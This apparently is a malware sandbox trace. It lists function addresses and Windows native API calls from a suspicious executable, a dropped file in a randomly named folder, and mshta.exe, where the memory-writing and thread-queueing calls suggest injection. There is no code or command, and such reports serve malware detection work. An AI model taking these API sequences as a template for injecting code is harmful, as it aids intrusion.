Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462AD0 NtReadFile,LdrInitializeThunk,	9_2_03462AD0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462AF0 NtWriteFile,LdrInitializeThunk,	9_2_03462AF0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462F30 NtCreateSection,LdrInitializeThunk,	9_2_03462F30
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462FE0 NtCreateFile,LdrInitializeThunk,	9_2_03462FE0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462FB0 NtResumeThread,LdrInitializeThunk,	9_2_03462FB0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462EE0 NtQueueApcThread,LdrInitializeThunk,	9_2_03462EE0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462E80 NtReadVirtualMemory,LdrInitializeThunk,	9_2_03462E80
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_03462D10
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462D30 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_03462D30
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462DD0 NtDelayExecution,LdrInitializeThunk,	9_2_03462DD0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_03462DF0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462C60 NtCreateKey,LdrInitializeThunk,	9_2_03462C60
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_03462C70
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_03462CA0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034635C0 NtCreateMutant,LdrInitializeThunk,	9_2_034635C0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034639B0 NtGetContextThread,LdrInitializeThunk,	9_2_034639B0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462B80 NtQueryInformationFile,	9_2_03462B80
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462AB0 NtWaitForSingleObject,	9_2_03462AB0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462F60 NtCreateProcessEx,	9_2_03462F60
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462F90 NtProtectVirtualMemory,	9_2_03462F90
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462FA0 NtQuerySection,	9_2_03462FA0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462E30 NtWriteVirtualMemory,	9_2_03462E30
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462EA0 NtAdjustPrivilegesToken,	9_2_03462EA0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462D00 NtSetInformationFile,	9_2_03462D00
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462DB0 NtEnumerateKey,	9_2_03462DB0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462C00 NtQueryInformationProcess,	9_2_03462C00
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462CC0 NtQueryVirtualMemory,	9_2_03462CC0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03462CF0 NtOpenProcess,	9_2_03462CF0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03463010 NtOpenDirectoryObject,	9_2_03463010
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03463090 NtSetValueKey,	9_2_03463090
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03463D70 NtOpenThread,	9_2_03463D70
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03463D10 NtOpenProcessToken,	9_2_03463D10
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A79240 NtCreateFile,	9_2_00A79240
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A793B0 NtReadFile,	9_2_00A793B0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A794A0 NtDeleteFile,	9_2_00A794A0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A79540 NtClose,	9_2_00A79540
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A796B0 NtAllocateVirtualMemory,	9_2_00A796B0

Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C70040	0_2_04C70040
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C7AC28	0_2_04C7AC28
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C72478	0_2_04C72478
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C775A0	0_2_04C775A0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C70007	0_2_04C70007
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C77168	0_2_04C77168
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C79240	0_2_04C79240
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C7E228	0_2_04C7E228
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C7AC18	0_2_04C7AC18
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C76D30	0_2_04C76D30
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_04C768F8	0_2_04C768F8
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 0_2_0514DF6C	0_2_0514DF6C
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00418573	4_2_00418573
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0040E077	4_2_0040E077
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0040E083	4_2_0040E083
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00401110	4_2_00401110
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00402A40	4_2_00402A40
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00402A3A	4_2_00402A3A
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0040445F	4_2_0040445F
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0042ECF3	4_2_0042ECF3
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0040FD2E	4_2_0040FD2E
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0040FD33	4_2_0040FD33
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00402660	4_2_00402660
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0040FF53	4_2_0040FF53
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00416773	4_2_00416773
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_00402F20	4_2_00402F20
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0040DF33	4_2_0040DF33
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01508158	4_2_01508158
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01470100	4_2_01470100
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0151A118	4_2_0151A118
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_015381CC	4_2_015381CC
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_015341A2	4_2_015341A2
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_015401AA	4_2_015401AA
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01512000	4_2_01512000
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153A352	4_2_0153A352
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_015403E6	4_2_015403E6
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0148E3F0	4_2_0148E3F0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01520274	4_2_01520274
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_015002C0	4_2_015002C0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01480535	4_2_01480535
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01540591	4_2_01540591
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01532446	4_2_01532446
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01524420	4_2_01524420
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0152E4F6	4_2_0152E4F6
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014A4750	4_2_014A4750
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01480770	4_2_01480770
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0147C7C0	4_2_0147C7C0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0149C6E0	4_2_0149C6E0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01496962	4_2_01496962
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0154A9A6	4_2_0154A9A6
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0148A840	4_2_0148A840
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014AE8F0	4_2_014AE8F0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014668B8	4_2_014668B8
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153AB40	4_2_0153AB40
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01536BD7	4_2_01536BD7
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0147EA80	4_2_0147EA80
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0148AD00	4_2_0148AD00
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0151CD1F	4_2_0151CD1F
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0147ADE0	4_2_0147ADE0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01498DBF	4_2_01498DBF
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01480C00	4_2_01480C00
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01470CF2	4_2_01470CF2
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01520CB5	4_2_01520CB5
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014F4F40	4_2_014F4F40
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01522F30	4_2_01522F30
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014C2F28	4_2_014C2F28
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014A0F30	4_2_014A0F30
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01472FC8	4_2_01472FC8
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0148CFE0	4_2_0148CFE0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014FEFA0	4_2_014FEFA0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01480E59	4_2_01480E59
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153EE26	4_2_0153EE26
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153EEDB	4_2_0153EEDB
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153CE93	4_2_0153CE93
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01492E90	4_2_01492E90
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014B516C	4_2_014B516C
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0146F172	4_2_0146F172
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0154B16B	4_2_0154B16B
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0148B1B0	4_2_0148B1B0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0152F0CC	4_2_0152F0CC
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153F0E0	4_2_0153F0E0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_015370E9	4_2_015370E9
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0146D34C	4_2_0146D34C
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153132D	4_2_0153132D
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014C739A	4_2_014C739A
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0149B2C0	4_2_0149B2C0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_015212ED	4_2_015212ED
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014852A0	4_2_014852A0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01537571	4_2_01537571
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_015495C3	4_2_015495C3
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0151D5B0	4_2_0151D5B0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01471460	4_2_01471460
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153F43F	4_2_0153F43F
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153F7B0	4_2_0153F7B0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014C5630	4_2_014C5630
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_015316CC	4_2_015316CC
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01489950	4_2_01489950
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0149B950	4_2_0149B950
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01515910	4_2_01515910
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014ED800	4_2_014ED800
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014838E0	4_2_014838E0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153FB76	4_2_0153FB76
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014BDBF9	4_2_014BDBF9
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014F5BF0	4_2_014F5BF0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0149FB80	4_2_0149FB80
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01537A46	4_2_01537A46
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153FA49	4_2_0153FA49
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014F3A6C	4_2_014F3A6C
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0152DAC6	4_2_0152DAC6
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014C5AA0	4_2_014C5AA0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01521AA3	4_2_01521AA3
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01483D40	4_2_01483D40
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01531D5A	4_2_01531D5A
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01537D73	4_2_01537D73
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0149FDC0	4_2_0149FDC0
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_014F9C32	4_2_014F9C32
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153FCF2	4_2_0153FCF2
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153FF09	4_2_0153FF09
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01443FD5	4_2_01443FD5
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01443FD2	4_2_01443FD2
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01481F92	4_2_01481F92
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_0153FFB1	4_2_0153FFB1
Source: C:\Users\user\Desktop\MmF9tcIj1J.exe	Code function: 4_2_01489EB0	4_2_01489EB0
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D0F3DE	8_2_03D0F3DE
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D06B9E	8_2_03D06B9E
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D08BBE	8_2_03D08BBE
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D111D8	8_2_03D111D8
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D08999	8_2_03D08999
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D0899E	8_2_03D0899E
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D2795E	8_2_03D2795E
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D06CE2	8_2_03D06CE2
Source: C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\lq9nGfkZ7JbZdUv7.exe	Code function: 8_2_03D06CEE	8_2_03D06CEE
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EA352	9_2_034EA352
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034F03E6	9_2_034F03E6
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0343E3F0	9_2_0343E3F0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034D0274	9_2_034D0274
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034B02C0	9_2_034B02C0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034B8158	9_2_034B8158
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03420100	9_2_03420100
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034CA118	9_2_034CA118
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034E81CC	9_2_034E81CC
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034F01AA	9_2_034F01AA
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034C2000	9_2_034C2000
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03454750	9_2_03454750
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03430770	9_2_03430770
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0342C7C0	9_2_0342C7C0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0344C6E0	9_2_0344C6E0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03430535	9_2_03430535
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034F0591	9_2_034F0591
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034E2446	9_2_034E2446
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034D4420	9_2_034D4420
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034DE4F6	9_2_034DE4F6
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EAB40	9_2_034EAB40
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034E6BD7	9_2_034E6BD7
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0342EA80	9_2_0342EA80
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03446962	9_2_03446962
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034FA9A6	9_2_034FA9A6
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0343A840	9_2_0343A840
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0345E8F0	9_2_0345E8F0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034168B8	9_2_034168B8
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034A4F40	9_2_034A4F40
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03472F28	9_2_03472F28
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03450F30	9_2_03450F30
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034D2F30	9_2_034D2F30
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03422FC8	9_2_03422FC8
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0343CFE0	9_2_0343CFE0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034AEFA0	9_2_034AEFA0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03430E59	9_2_03430E59
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EEE26	9_2_034EEE26
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EEEDB	9_2_034EEEDB
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03442E90	9_2_03442E90
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034ECE93	9_2_034ECE93
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0343AD00	9_2_0343AD00
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034CCD1F	9_2_034CCD1F
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0342ADE0	9_2_0342ADE0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03448DBF	9_2_03448DBF
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03430C00	9_2_03430C00
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03420CF2	9_2_03420CF2
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034D0CB5	9_2_034D0CB5
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0341D34C	9_2_0341D34C
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034E132D	9_2_034E132D
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0347739A	9_2_0347739A
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0344B2C0	9_2_0344B2C0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034D12ED	9_2_034D12ED
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034352A0	9_2_034352A0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034FB16B	9_2_034FB16B
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0346516C	9_2_0346516C
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0341F172	9_2_0341F172
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0343B1B0	9_2_0343B1B0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034DF0CC	9_2_034DF0CC
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034E70E9	9_2_034E70E9
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EF0E0	9_2_034EF0E0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EF7B0	9_2_034EF7B0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034E16CC	9_2_034E16CC
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034E7571	9_2_034E7571
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034CD5B0	9_2_034CD5B0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03421460	9_2_03421460
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EF43F	9_2_034EF43F
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EFB76	9_2_034EFB76
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034A5BF0	9_2_034A5BF0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0346DBF9	9_2_0346DBF9
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0344FB80	9_2_0344FB80
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EFA49	9_2_034EFA49
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034E7A46	9_2_034E7A46
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034A3A6C	9_2_034A3A6C
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034DDAC6	9_2_034DDAC6
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03475AA0	9_2_03475AA0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034D1AA3	9_2_034D1AA3
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03439950	9_2_03439950
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0344B950	9_2_0344B950
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034C5910	9_2_034C5910
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0349D800	9_2_0349D800
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034338E0	9_2_034338E0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EFF09	9_2_034EFF09
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03431F92	9_2_03431F92
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EFFB1	9_2_034EFFB1
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03439EB0	9_2_03439EB0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_03433D40	9_2_03433D40
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034E1D5A	9_2_034E1D5A
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034E7D73	9_2_034E7D73
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_0344FDC0	9_2_0344FDC0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034A9C32	9_2_034A9C32
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_034EFCF2	9_2_034EFCF2
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A61D20	9_2_00A61D20
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A5CBA0	9_2_00A5CBA0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A5CB9B	9_2_00A5CB9B
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A5ADA0	9_2_00A5ADA0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A5CDC0	9_2_00A5CDC0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A5AEE4	9_2_00A5AEE4
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A5AEF0	9_2_00A5AEF0
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A512CC	9_2_00A512CC
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 9_2_00A653E0	9_2_00A653E0
